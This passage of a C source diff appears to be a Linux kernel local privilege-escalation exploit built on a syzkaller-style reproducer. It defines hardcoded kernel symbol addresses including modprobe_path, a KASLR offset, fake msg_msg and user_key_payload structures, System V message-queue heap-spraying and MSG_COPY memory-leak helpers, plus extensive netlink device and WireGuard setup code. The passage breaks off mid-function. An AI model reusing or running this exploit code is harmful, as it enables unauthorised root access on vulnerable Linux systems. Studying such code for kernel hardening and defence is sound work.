MSG_HEADER_SIZE 0x30 +#define MSG_SPARY 0x37 + +uint64_t addr_single_start = 0xffffffff8134b7f0; +uint64_t addr_single_stop = 0xffffffff8134b830; +uint64_t addr_single_next = 0xffffffff8134b810; +uint64_t addr_modprobe_path = 0xffffffff82e6e220; + +int64_t kaslr_offset = 0; +int pause_flag = 1; +char *evil_buffer; +uint64_t msg_next = NULL, msglist_prev = NULL, msglist_next = NULL; +int fuse_fd = -1; +void *fuse_mem_addr = NULL; + +int msqid[0x1000]; +int max_msg; +//#include "sandbox.h" +struct list_head { + struct list_head *next, *prev; +}; + +struct msgbuf_key { + long mtype; + char mtext[1]; +}; + +struct spary_msg_arg { + int msqid; + int start; + int loop; + int size; + char *payload; + void *dst; +}; + +struct msg +{ + long mtype; + char mtext[1]; +}; + +struct fake_msg_msg { + struct list_head m_list; + long m_type; + size_t m_ts; /* message text size */ + void *next; + void *security; + /* the actual message follows immediately */ +}; + +typedef struct +{ + int done; + pthread_mutex_t mutex; + pthread_mutex_t proc_mutex[N_PROCS+1]; +} shared_data; + +struct spray_argv { + void *addr; + int size; + pthread_mutex_t *mutex; + int *count; +}; + +static shared_data *free_mutex; +static shared_data *spray_lock; +static shared_data *two_loop; +static shared_data *shell_lock; +static shared_data *hang_threads; +struct fake_user_key_payload { + void *next; + void *callback; + short unsigned int datalen; +}; + +static unsigned long long procid; + +static __thread int skip_segv; +static __thread jmp_buf segv_env; + + +void *recvmymsg(int _msqid, int size, void *memdump, int type, int free) { + if (!free) + free = MSG_COPY; + if (msgrcv(_msqid, (void *) memdump, size, type, + IPC_NOWAIT | free | MSG_NOERROR) == -1) { + if(errno != ENOMSG) { + perror("msgrcv"); + exit(1); + } + } +} + +int msg_spray(int num_msg, int size, int loop) { + int i; +#ifdef MSG_DEBUG + printf("[*] msg_spray: num_msg: %d, size: %d, loop: %d\n", num_msg, size, loop); +#endif + + for (i = 0; imtext[0], MSG_SPARY, buff_size); + for (i = start; i < start+loop; i++) { + msg_key->mtype = BASE_MSGTYPE + i; + //printf("[*] sendmymsg: msqid: %d, mtype: %ld\n", _msqid, msg_key->mtype); + int ret = msgsnd(_msqid, msg_key, buff_size, 0); + //printf("[*] sendmymsg: msqid: %d, ret: %d\n", _msqid, ret); + if (ret == -1) { + printf("msgsnd error\n"); + exit(1); + } + } + free(msg_key); +} + +void load_symbols() +{ + struct utsname version; + char buf[1024]; + char *symbol; + int ret; + FILE *fp; + u_int64_t addr; + + ret = uname(&version); + if (ret != 0) { + printf("Failed to retrieve kernel version using uname()\n"); + exit(EXIT_FAILURE); + } + printf("Kernel version %s\n", version.release); + + memset(buf, 0, sizeof(buf)); + snprintf(buf, sizeof(buf), "symbols/System.map-%s", version.release); + + fp = fopen(buf, "r"); + if (fp == NULL) { + printf("Failed to open symbol file %s\n", buf); + return; + } + + while(fgets(buf, sizeof(buf), fp) != NULL) { + buf[16] = 0; + addr = strtoul(buf, NULL, 16); + symbol = &buf[19]; + if (!strcmp(symbol, "single_start\n")) { + addr_single_start = addr; + printf("0x%016llx single_start\n", addr_single_start); + } + if (!strcmp(symbol, "single_stop\n")) { + addr_single_stop = addr; + printf("0x%016llx single_stop\n", addr_single_stop); + } + if (!strcmp(symbol, "single_next\n")) { + addr_single_next = addr; + printf("0x%016llx single_next\n", addr_single_next); + } + if (!strcmp(symbol, "modprobe_path\n")) { + addr_modprobe_path = addr; + printf("0x%016llx modprobe_path\n", addr_modprobe_path); + } + } + + fclose(fp); + + if (!addr_single_start || + !addr_single_stop || + !addr_single_next || + !addr_modprobe_path) { + printf("Missing at least one symbols.\n"); + exit(EXIT_FAILURE); + } +} + +#define NONFAILING(...) \ + ({ \ + int ok = 1; \ + __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ + if (_setjmp(segv_env) == 0) { \ + __VA_ARGS__; \ + } else \ + ok = 0; \ + __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ + ok; \ + }) + +static bool write_file(const char* file, const char* what, ...) +{ + char buf[1024]; + va_list args; + va_start(args, what); + vsnprintf(buf, sizeof(buf), what, args); + va_end(args); + buf[sizeof(buf) - 1] = 0; + int len = strlen(buf); + int fd = open(file, O_WRONLY | O_CLOEXEC); + if (fd == -1) + return false; + if (write(fd, buf, len) != len) { + int err = errno; + close(fd); + errno = err; + return false; + } + close(fd); + return true; +} + +struct nlmsg { + char* pos; + int nesting; + struct nlattr* nested[8]; + char buf[4096]; +}; + +static void netlink_init(struct nlmsg* nlmsg, int typ, int flags, + const void* data, int size) +{ + memset(nlmsg, 0, sizeof(*nlmsg)); + struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf; + hdr->nlmsg_type = typ; + hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags; + memcpy(hdr + 1, data, size); + nlmsg->pos = (char*)(hdr + 1) + NLMSG_ALIGN(size); +} + +static void netlink_attr(struct nlmsg* nlmsg, int typ, const void* data, + int size) +{ + struct nlattr* attr = (struct nlattr*)nlmsg->pos; + attr->nla_len = sizeof(*attr) + size; + attr->nla_type = typ; + if (size > 0) + memcpy(attr + 1, data, size); + nlmsg->pos += NLMSG_ALIGN(attr->nla_len); +} + +static void netlink_nest(struct nlmsg* nlmsg, int typ) +{ + struct nlattr* attr = (struct nlattr*)nlmsg->pos; + attr->nla_type = typ; + nlmsg->pos += sizeof(*attr); + nlmsg->nested[nlmsg->nesting++] = attr; +} + +static void netlink_done(struct nlmsg* nlmsg) +{ + struct nlattr* attr = nlmsg->nested[--nlmsg->nesting]; + attr->nla_len = nlmsg->pos - (char*)attr; +} + +static int netlink_send_ext(struct nlmsg* nlmsg, int sock, uint16_t reply_type, + int* reply_len, bool dofail) +{ + if (nlmsg->pos > nlmsg->buf + sizeof(nlmsg->buf) || nlmsg->nesting) + exit(1); + struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf; + hdr->nlmsg_len = nlmsg->pos - nlmsg->buf; + struct sockaddr_nl addr; + memset(&addr, 0, sizeof(addr)); + addr.nl_family = AF_NETLINK; + ssize_t n = sendto(sock, nlmsg->buf, hdr->nlmsg_len, 0, + (struct sockaddr*)&addr, sizeof(addr)); + if (n != (ssize_t)hdr->nlmsg_len) { + if (dofail) + exit(1); + return -1; + } + n = recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0); + if (reply_len) + *reply_len = 0; + if (n < 0) { + if (dofail) + exit(1); + return -1; + } + if (n < (ssize_t)sizeof(struct nlmsghdr)) { + errno = EINVAL; + if (dofail) + exit(1); + return -1; + } + if (hdr->nlmsg_type == NLMSG_DONE) + return 0; + if (reply_len && hdr->nlmsg_type == reply_type) { + *reply_len = n; + return 0; + } + if (n < (ssize_t)(sizeof(struct nlmsghdr) + sizeof(struct nlmsgerr))) { + errno = EINVAL; + if (dofail) + exit(1); + return -1; + } + if (hdr->nlmsg_type != NLMSG_ERROR) { + errno = EINVAL; + if (dofail) + exit(1); + return -1; + } + errno = -((struct nlmsgerr*)(hdr + 1))->error; + return -errno; +} + +static int netlink_send(struct nlmsg* nlmsg, int sock) +{ + return netlink_send_ext(nlmsg, sock, 0, NULL, true); +} + +static int netlink_query_family_id(struct nlmsg* nlmsg, int sock, + const char* family_name, bool dofail) +{ + struct genlmsghdr genlhdr; + memset(&genlhdr, 0, sizeof(genlhdr)); + genlhdr.cmd = CTRL_CMD_GETFAMILY; + netlink_init(nlmsg, GENL_ID_CTRL, 0, &genlhdr, sizeof(genlhdr)); + netlink_attr(nlmsg, CTRL_ATTR_FAMILY_NAME, family_name, + strnlen(family_name, GENL_NAMSIZ - 1) + 1); + int n = 0; + int err = netlink_send_ext(nlmsg, sock, GENL_ID_CTRL, &n, dofail); + if (err < 0) { + return -1; + } + uint16_t id = 0; + struct nlattr* attr = (struct nlattr*)(nlmsg->buf + NLMSG_HDRLEN + + NLMSG_ALIGN(sizeof(genlhdr))); + for (; (char*)attr < nlmsg->buf + n; + attr = (struct nlattr*)((char*)attr + NLMSG_ALIGN(attr->nla_len))) { + if (attr->nla_type == CTRL_ATTR_FAMILY_ID) { + id = *(uint16_t*)(attr + 1); + break; + } + } + if (!id) { + errno = EINVAL; + return -1; + } + recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0); + return id; +} + +static int netlink_next_msg(struct nlmsg* nlmsg, unsigned int offset, + unsigned int total_len) +{ + struct nlmsghdr* hdr = (struct nlmsghdr*)(nlmsg->buf + offset); + if (offset == total_len || offset + hdr->nlmsg_len > total_len) + return -1; + return hdr->nlmsg_len; +} + +static void netlink_add_device_impl(struct nlmsg* nlmsg, const char* type, + const char* name) +{ + struct ifinfomsg hdr; + memset(&hdr, 0, sizeof(hdr)); + netlink_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, + sizeof(hdr)); + if (name) + netlink_attr(nlmsg, IFLA_IFNAME, name, strlen(name)); + netlink_nest(nlmsg, IFLA_LINKINFO); + netlink_attr(nlmsg, IFLA_INFO_KIND, type, strlen(type)); +} + +static void netlink_add_device(struct nlmsg* nlmsg, int sock, const char* type, + const char* name) +{ + netlink_add_device_impl(nlmsg, type, name); + netlink_done(nlmsg); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_add_veth(struct nlmsg* nlmsg, int sock, const char* name, + const char* peer) +{ + netlink_add_device_impl(nlmsg, "veth", name); + netlink_nest(nlmsg, IFLA_INFO_DATA); + netlink_nest(nlmsg, VETH_INFO_PEER); + nlmsg->pos += sizeof(struct ifinfomsg); + netlink_attr(nlmsg, IFLA_IFNAME, peer, strlen(peer)); + netlink_done(nlmsg); + netlink_done(nlmsg); + netlink_done(nlmsg); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_add_hsr(struct nlmsg* nlmsg, int sock, const char* name, + const char* slave1, const char* slave2) +{ + netlink_add_device_impl(nlmsg, "hsr", name); + netlink_nest(nlmsg, IFLA_INFO_DATA); + int ifindex1 = if_nametoindex(slave1); + netlink_attr(nlmsg, IFLA_HSR_SLAVE1, &ifindex1, sizeof(ifindex1)); + int ifindex2 = if_nametoindex(slave2); + netlink_attr(nlmsg, IFLA_HSR_SLAVE2, &ifindex2, sizeof(ifindex2)); + netlink_done(nlmsg); + netlink_done(nlmsg); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_add_linked(struct nlmsg* nlmsg, int sock, const char* type, + const char* name, const char* link) +{ + netlink_add_device_impl(nlmsg, type, name); + netlink_done(nlmsg); + int ifindex = if_nametoindex(link); + netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex)); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_add_vlan(struct nlmsg* nlmsg, int sock, const char* name, + const char* link, uint16_t id, uint16_t proto) +{ + netlink_add_device_impl(nlmsg, "vlan", name); + netlink_nest(nlmsg, IFLA_INFO_DATA); + netlink_attr(nlmsg, IFLA_VLAN_ID, &id, sizeof(id)); + netlink_attr(nlmsg, IFLA_VLAN_PROTOCOL, &proto, sizeof(proto)); + netlink_done(nlmsg); + netlink_done(nlmsg); + int ifindex = if_nametoindex(link); + netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex)); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_add_macvlan(struct nlmsg* nlmsg, int sock, const char* name, + const char* link) +{ + netlink_add_device_impl(nlmsg, "macvlan", name); + netlink_nest(nlmsg, IFLA_INFO_DATA); + uint32_t mode = MACVLAN_MODE_BRIDGE; + netlink_attr(nlmsg, IFLA_MACVLAN_MODE, &mode, sizeof(mode)); + netlink_done(nlmsg); + netlink_done(nlmsg); + int ifindex = if_nametoindex(link); + netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex)); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_add_geneve(struct nlmsg* nlmsg, int sock, const char* name, + uint32_t vni, struct in_addr* addr4, + struct in6_addr* addr6) +{ + netlink_add_device_impl(nlmsg, "geneve", name); + netlink_nest(nlmsg, IFLA_INFO_DATA); + netlink_attr(nlmsg, IFLA_GENEVE_ID, &vni, sizeof(vni)); + if (addr4) + netlink_attr(nlmsg, IFLA_GENEVE_REMOTE, addr4, sizeof(*addr4)); + if (addr6) + netlink_attr(nlmsg, IFLA_GENEVE_REMOTE6, addr6, sizeof(*addr6)); + netlink_done(nlmsg); + netlink_done(nlmsg); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +#define IFLA_IPVLAN_FLAGS 2 +#define IPVLAN_MODE_L3S 2 +#undef IPVLAN_F_VEPA +#define IPVLAN_F_VEPA 2 + +static void netlink_add_ipvlan(struct nlmsg* nlmsg, int sock, const char* name, + const char* link, uint16_t mode, uint16_t flags) +{ + netlink_add_device_impl(nlmsg, "ipvlan", name); + netlink_nest(nlmsg, IFLA_INFO_DATA); + netlink_attr(nlmsg, IFLA_IPVLAN_MODE, &mode, sizeof(mode)); + netlink_attr(nlmsg, IFLA_IPVLAN_FLAGS, &flags, sizeof(flags)); + netlink_done(nlmsg); + netlink_done(nlmsg); + int ifindex = if_nametoindex(link); + netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex)); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_device_change(struct nlmsg* nlmsg, int sock, + const char* name, bool up, const char* master, + const void* mac, int macsize, + const char* new_name) +{ + struct ifinfomsg hdr; + memset(&hdr, 0, sizeof(hdr)); + if (up) + hdr.ifi_flags = hdr.ifi_change = IFF_UP; + hdr.ifi_index = if_nametoindex(name); + netlink_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr)); + if (new_name) + netlink_attr(nlmsg, IFLA_IFNAME, new_name, strlen(new_name)); + if (master) { + int ifindex = if_nametoindex(master); + netlink_attr(nlmsg, IFLA_MASTER, &ifindex, sizeof(ifindex)); + } + if (macsize) + netlink_attr(nlmsg, IFLA_ADDRESS, mac, macsize); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static int netlink_add_addr(struct nlmsg* nlmsg, int sock, const char* dev, + const void* addr, int addrsize) +{ + struct ifaddrmsg hdr; + memset(&hdr, 0, sizeof(hdr)); + hdr.ifa_family = addrsize == 4 ? AF_INET : AF_INET6; + hdr.ifa_prefixlen = addrsize == 4 ? 24 : 120; + hdr.ifa_scope = RT_SCOPE_UNIVERSE; + hdr.ifa_index = if_nametoindex(dev); + netlink_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, + sizeof(hdr)); + netlink_attr(nlmsg, IFA_LOCAL, addr, addrsize); + netlink_attr(nlmsg, IFA_ADDRESS, addr, addrsize); + return netlink_send(nlmsg, sock); +} + +static void netlink_add_addr4(struct nlmsg* nlmsg, int sock, const char* dev, + const char* addr) +{ + struct in_addr in_addr; + inet_pton(AF_INET, addr, &in_addr); + int err = netlink_add_addr(nlmsg, sock, dev, &in_addr, sizeof(in_addr)); + if (err < 0) { + } +} + +static void netlink_add_addr6(struct nlmsg* nlmsg, int sock, const char* dev, + const char* addr) +{ + struct in6_addr in6_addr; + inet_pton(AF_INET6, addr, &in6_addr); + int err = netlink_add_addr(nlmsg, sock, dev, &in6_addr, sizeof(in6_addr)); + if (err < 0) { + } +} + +static struct nlmsg nlmsg; + +#define DEVLINK_FAMILY_NAME "devlink" + +#define DEVLINK_CMD_PORT_GET 5 +#define DEVLINK_ATTR_BUS_NAME 1 +#define DEVLINK_ATTR_DEV_NAME 2 +#define DEVLINK_ATTR_NETDEV_NAME 7 + +static struct nlmsg nlmsg2; + +static void initialize_devlink_ports(const char* bus_name, const char* dev_name, + const char* netdev_prefix) +{ + struct genlmsghdr genlhdr; + int len, total_len, id, err, offset; + uint16_t netdev_index; + int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC); + if (sock == -1) + exit(1); + int rtsock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (rtsock == -1) + exit(1); + id = netlink_query_family_id(&nlmsg, sock, DEVLINK_FAMILY_NAME, true); + if (id == -1) + goto error; + memset(&genlhdr, 0, sizeof(genlhdr)); + genlhdr.cmd = DEVLINK_CMD_PORT_GET; + netlink_init(&nlmsg, id, NLM_F_DUMP, &genlhdr, sizeof(genlhdr)); + netlink_attr(&nlmsg, DEVLINK_ATTR_BUS_NAME, bus_name, strlen(bus_name) + 1); + netlink_attr(&nlmsg, DEVLINK_ATTR_DEV_NAME, dev_name, strlen(dev_name) + 1); + err = netlink_send_ext(&nlmsg, sock, id, &total_len, true); + if (err < 0) { + goto error; + } + offset = 0; + netdev_index = 0; + while ((len = netlink_next_msg(&nlmsg, offset, total_len)) != -1) { + struct nlattr* attr = (struct nlattr*)(nlmsg.buf + offset + NLMSG_HDRLEN + + NLMSG_ALIGN(sizeof(genlhdr))); + for (; (char*)attr < nlmsg.buf + offset + len; + attr = (struct nlattr*)((char*)attr + NLMSG_ALIGN(attr->nla_len))) { + if (attr->nla_type == DEVLINK_ATTR_NETDEV_NAME) { + char* port_name; + char netdev_name[IFNAMSIZ]; + port_name = (char*)(attr + 1); + snprintf(netdev_name, sizeof(netdev_name), "%s%d", netdev_prefix, + netdev_index); + netlink_device_change(&nlmsg2, rtsock, port_name, true, 0, 0, 0, + netdev_name); + break; + } + } + offset += len; + netdev_index++; + } +error: + close(rtsock); + close(sock); +} + +#define DEV_IPV4 "172.20.20.%d" +#define DEV_IPV6 "fe80::%02x" +#define DEV_MAC 0x00aaaaaaaaaa + +static void netdevsim_add(unsigned int addr, unsigned int port_count) +{ + char buf[16]; + sprintf(buf, "%u %u", addr, port_count); + if (write_file("/sys/bus/netdevsim/new_device", buf)) { + snprintf(buf, sizeof(buf), "netdevsim%d", addr); + initialize_devlink_ports("netdevsim", buf, "netdevsim"); + } +} + +#define WG_GENL_NAME "wireguard" +enum wg_cmd { + WG_CMD_GET_DEVICE, + WG_CMD_SET_DEVICE, +}; +enum wgdevice_attribute { + WGDEVICE_A_UNSPEC, + WGDEVICE_A_IFINDEX, + WGDEVICE_A_IFNAME, + WGDEVICE_A_PRIVATE_KEY, + WGDEVICE_A_PUBLIC_KEY, + WGDEVICE_A_FLAGS, + WGDEVICE_A_LISTEN_PORT, + WGDEVICE_A_FWMARK, + WGDEVICE_A_PEERS, +}; +enum wgpeer_attribute { + WGPEER_A_UNSPEC, + WGPEER_A_PUBLIC_KEY, + WGPEER_A_PRESHARED_KEY, + WGPEER_A_FLAGS, + WGPEER_A_ENDPOINT, + WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + WGPEER_A_LAST_HANDSHAKE_TIME, + WGPEER_A_RX_BYTES, + WGPEER_A_TX_BYTES, + WGPEER_A_ALLOWEDIPS, + WGPEER_A_PROTOCOL_VERSION, +}; +enum wgallowedip_attribute { + WGALLOWEDIP_A_UNSPEC, + WGALLOWEDIP_A_FAMILY, + WGALLOWEDIP_A_IPADDR, + WGALLOWEDIP_A_CIDR_MASK, +}; + +static void netlink_wireguard_setup(void) +{ + const char ifname_a[] = "wg0"; + const char ifname_b[] = "wg1"; + const char ifname_c[] = "wg2"; + const char private_a[] = + "\xa0\x5c\xa8\x4f\x6c\x9c\x8e\x38\x53\xe2\xfd\x7a\x70\xae\x0f\xb2\x0f\xa1" + "\x52\x60\x0c\xb0\x08\x45\x17\x4f\x08\x07\x6f\x8d\x78\x43"; + const char private_b[] = + "\xb0\x80\x73\xe8\xd4\x4e\x91\xe3\xda\x92\x2c\x22\x43\x82\x44\xbb\x88\x5c" + "\x69\xe2\x69\xc8\xe9\xd8\x35\xb1\x14\x29\x3a\x4d\xdc\x6e"; + const char private_c[] = + "\xa0\xcb\x87\x9a\x47\xf5\xbc\x64\x4c\x0e\x69\x3f\xa6\xd0\x31\xc7\x4a\x15" + "\x53\xb6\xe9\x01\xb9\xff\x2f\x51\x8c\x78\x04\x2f\xb5\x42"; + const char public_a[] = + "\x97\x5c\x9d\x81\xc9\x83\xc8\x20\x9e\xe7\x81\x25\x4b\x89\x9f\x8e\xd9\x25" + "\xae\x9f\x09\x23\xc2\x3c\x62\xf5\x3c\x57\xcd\xbf\x69\x1c"; + const char public_b[] = + "\xd1\x73\x28\x99\xf6\x11\xcd\x89\x94\x03\x4d\x7f\x41\x3d\xc9\x57\x63\x0e" + "\x54\x93\xc2\x85\xac\xa4\x00\x65\xcb\x63\x11\xbe\x69\x6b"; + const char public_c[] = + "\xf4\x4d\xa3\x67\xa8\x8e\xe6\x56\x4f\x02\x02\x11\x45\x67\x27\x08\x2f\x5c" + "\xeb\xee\x8b\x1b\xf5\xeb\x73\x37\x34\x1b\x45\x9b\x39\x22"; + const uint16_t listen_a = 20001; + const uint16_t listen_b = 20002; + const uint16_t listen_c = 20003; + const uint16_t af_inet = AF_INET; + const uint16_t af_inet6 = AF_INET6; + const struct sockaddr_in endpoint_b_v4 = { + .sin_family = AF_INET, + .sin_port = htons(listen_b), + .sin_addr = {htonl(INADDR_LOOPBACK)}}; + const struct sockaddr_in endpoint_c_v4 = { + .sin_family = AF_INET, + .sin_port = htons(listen_c), + .sin_addr = {htonl(INADDR_LOOPBACK)}}; + struct sockaddr_in6 endpoint_a_v6 = {.sin6_family = AF_INET6, + .sin6_port = htons(listen_a)}; + endpoint_a_v6.sin6_addr = in6addr_loopback; + struct sockaddr_in6 endpoint_c_v6 = {.sin6_family = AF_INET6, + .sin6_port = htons(listen_c)}; + endpoint_c_v6.sin6_addr = in6addr_loopback; + const struct in_addr first_half_v4 = {0}; + const struct in_addr second_half_v4 = {(uint32_t)htonl(128 << 24)}; + const struct in6_addr first_half_v6 = {{{0}}}; + const struct in6_addr second_half_v6 = {{{0x80}}}; + const uint8_t half_cidr = 1; + const uint16_t persistent_keepalives[] = {1, 3, 7, 9, 14, 19}; + struct genlmsghdr genlhdr = {.cmd = WG_CMD_SET_DEVICE, .version = 1}; + int sock; + int id, err; + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC); + if (sock == -1) { + return; + } + id = netlink_query_family_id(&nlmsg, sock, WG_GENL_NAME, true); + if (id == -1) + goto error; + netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr)); + netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_a, strlen(ifname_a) + 1); + netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_a, 32); + netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_a, 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_b, 32); + netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_b_v4, + sizeof(endpoint_b_v4)); + netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + &persistent_keepalives[0], 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4, + sizeof(first_half_v4)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6, + sizeof(first_half_v6)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_c, 32); + netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_c_v6, + sizeof(endpoint_c_v6)); + netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + &persistent_keepalives[1], 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4, + sizeof(second_half_v4)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6, + sizeof(second_half_v6)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + err = netlink_send(&nlmsg, sock); + if (err < 0) { + } + netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr)); + netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_b, strlen(ifname_b) + 1); + netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_b, 32); + netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_b, 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_a, 32); + netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_a_v6, + sizeof(endpoint_a_v6)); + netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + &persistent_keepalives[2], 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4, + sizeof(first_half_v4)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6, + sizeof(first_half_v6)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_c, 32); + netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_c_v4, + sizeof(endpoint_c_v4)); + netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + &persistent_keepalives[3], 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4, + sizeof(second_half_v4)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6, + sizeof(second_half_v6)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + err = netlink_send(&nlmsg, sock); + if (err < 0) { + } + netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr)); + netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_c, strlen(ifname_c) + 1); + netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_c, 32); + netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_c, 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_a, 32); + netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_a_v6, + sizeof(endpoint_a_v6)); + netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + &persistent_keepalives[4], 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4, + sizeof(first_half_v4)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, 